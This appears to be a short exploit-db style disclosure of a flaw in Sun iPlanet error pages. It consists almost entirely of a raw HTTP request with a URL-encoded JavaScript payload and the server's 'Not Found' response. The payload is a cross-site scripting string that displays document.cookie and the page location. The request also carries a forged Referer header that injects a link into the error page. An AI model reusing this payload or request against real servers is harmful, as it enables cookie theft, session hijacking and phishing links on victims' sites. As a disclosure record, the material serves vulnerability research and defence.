Sun iPlanet Error Page Link Injection

`  
Sun iPlanet Error Page Link Injection  
  
known about long time, but no CVE! probably because this really lame   
vulnerability! some security pro will say this good for social   
engineering and give cyberwar example!  
  
  
GET  
/%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%61%74%69%6f%6e%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2b%27%5c%72%43%6f%6f%6b%69%65%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%2f%2f%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d   
HTTP/1.1  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
application/x-shockwave-flash, */*  
Referer: http://exploit-db.com/  
Accept-Language: en-us  
Content-Type: application/x-www-form-urlencoded  
UA-CPU: x86  
Accept-Encoding: gzip, deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR  
1.1.4321; InfoPath.2; .NET CLR 2.0.50737)  
Host: target.server  
Cache-Control: no-cache  
Cookie: ARPT=MyCoOkIe  
Connection: close  
  
  
  
<HEAD><META HTTP-EQUIV="Content-Type"  
CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD>  
<H1>Not Found</H1> The requested object does not exist on this server.   
The link you followed is either outdated, inaccurate, or the server has   
been instructed not to let you have it. Please inform the site   
administrator of the <A HREF="https://exploit-db/">referring page</A>.  
`